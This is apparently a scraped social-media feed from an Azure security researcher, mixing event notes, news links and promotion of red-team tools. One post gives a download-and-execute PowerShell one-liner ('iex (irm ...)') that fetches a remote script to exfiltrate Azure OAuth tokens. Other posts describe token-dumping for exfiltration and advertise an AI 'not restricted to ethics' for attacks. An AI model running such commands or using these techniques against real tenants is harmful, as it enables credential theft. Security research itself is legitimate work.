Azure Tenant Takeover: From Exposed Config to Global Admin azurehacking.com/post/azure-t...
Azure Tenant Takeover: From Exposed Config to Global Admin azurehacking.com/post/azure-t...
๐ดโโ ๏ธ ๐ก๐ฒ๐ ๐ฃ๐ข๐: ๐๐ฒ๐ฑ๐ฒ๐ฟ๐ฎ๐๐ฒ๐ฑ ๐๐ฑ๐ฒ๐ป๐๐ถ๐๐ ๐๐ฟ๐ฒ๐ฑ๐ฒ๐ป๐๐ถ๐ฎ๐น ๐ถ๐ป๐ท๐ฒ๐ฐ๐๐ถ๐ผ๐ป
This POC shows how you can inject a federated credential on a UAMI, mint a Graph token in less than ~5s without any infrastructure setup!
azurehacking.com/post.html?sl...
Getting Started with the BlackCat PowerShell Module azurehacking.com/post.html?sl...
Had a great time presenting โHacking Azureโ with #BlackCat at @mc2mc.be.
Thank you to @Savaco for providing such an excellent location.
Iโm finalizing the slides, recording short videos, and updating the walkthrough so attendees can easily revisit the steps demonstrated.
Traveling through Florida for three weeks this summer. I am getting crazy of all the waivers that needs to be signed everywhere.
I wouldnโt be surprised if I need to sign a waiver if you need to fart next time.
That was fun spending of my Sunday afternoon. Working on ways to create persistence in Azure on a place where you wouldn't expect it.
If you never look away, you will only see what happens in front of you.
Operating the camera ๐ท at the #YellowHat event at @Microsoft
Are you looking for a malcious Copilot that is not restricted to ethics and is willing to be your wingman during cyber attacks? Check app.whiterabbitneo.com
๐จAzTokenDumpr ๐จ
I have created a PoC to quickly exfiltrate #Microsoft #Azure oAuth Tokens from PowerShell. no installation required!
run: PS> iex (irm bit.ly/blct-token)
In this article, we will walk through a solution that leverages GitHub Actions to automate the process of adding new members to a GitHub organization.
The Clone2Leak vulnerability involves the improper handling of messages in the Git Credential Protocol within GitHub Desktop and Git Credential Manager. This means that an attacker could potentially gain access to your Git credentials, posing a significant security
flatt.tech/research/pos...
In this article, I'm excited to introduce a project I've been working on to securely share secrets using only Azure resources.
rogierdijkman.medium.com/self-hosted-...
๐จ ANNOUNCEMENT๐จ
I'm excited to announce the start of the "GitHub Lowlands" user group! ๐คฉ
This is going to be awesome for connecting with others and stay up-date on everything about GitHub.
@github.com @arthurvandijk.bsky.social
#github #copilot #community
๐จย New Blog Alert!ย ๐จ
In this article, I delve into the recent brute force campaign leveraging the 'fasthttp library' to target Azure Active Directory (AAD) accounts.
Learn how to detect these attacks using Kusto Query Language (KQL) in Microsoft Defender
www.speartip.com/fasthttp-use...
**Monitor Logs**: Regularly inspect audit logs for FastHTTP user agents to detect suspicious activity.
๐จ **Patch Alert!** ๐จ Microsoftโs January 2025 Patch Tuesday is here, and itโs packed with security updates! ๐ก๏ธ
๐ Check out the full scoop here: [Microsoft January 2025 Patch Tuesday](www.cyberkendra.com/2025/01/micr...) ๐ #CyberSecurity #WindowsUpdate
Ready to dive into the details? ๐ป๐ง๐
Having fun with Microsoft Azure
Working on a fun little PoC project to securely share a password or secret and destroy it after it has been fetched.
Using a FunctionApp and KeyVault
Yeah, it does work at the bottom al lingerie as the comment block is within the function brackets.
I always find it clear when it is placed at the bottom of the code.
I have created a nice little script as bart of project #blackcat to quickly dump all Azure #oAuth tokens based on the current context and export them to a file for exfiltration purposes.
github.com/azurekid/bla...
WoW, this is awesome!
GitHub Copilot now offers a free tier
github.com/login?return...
Kali Linux 2024.4 released with 14 new tools, deprecates some features
www.kali.org/blog/kali-li...
#Security
Researchers cracked a Microsoft Azure method for multifactor authentication (MFA) in about an hour
www.oasis.security/resources/bl...
#Microsoft #Security #MFA
Whoop! Patch Tuesday had some interesting stuff. What was keeping you awake?
www.darkreading.com/application-...
In today's "Learn to Red Team AI Systems using PyRIT" using PyRIT to find high-quality bugs in generative AI systems. If you missed the live session, you can watch the recording here: youtu.be/jq9DcEL3cHE?...
โถ๏ธPyRIT: github.com/Azure/PyRIT
www.microsoftrnd.co.il/bluehatil/co...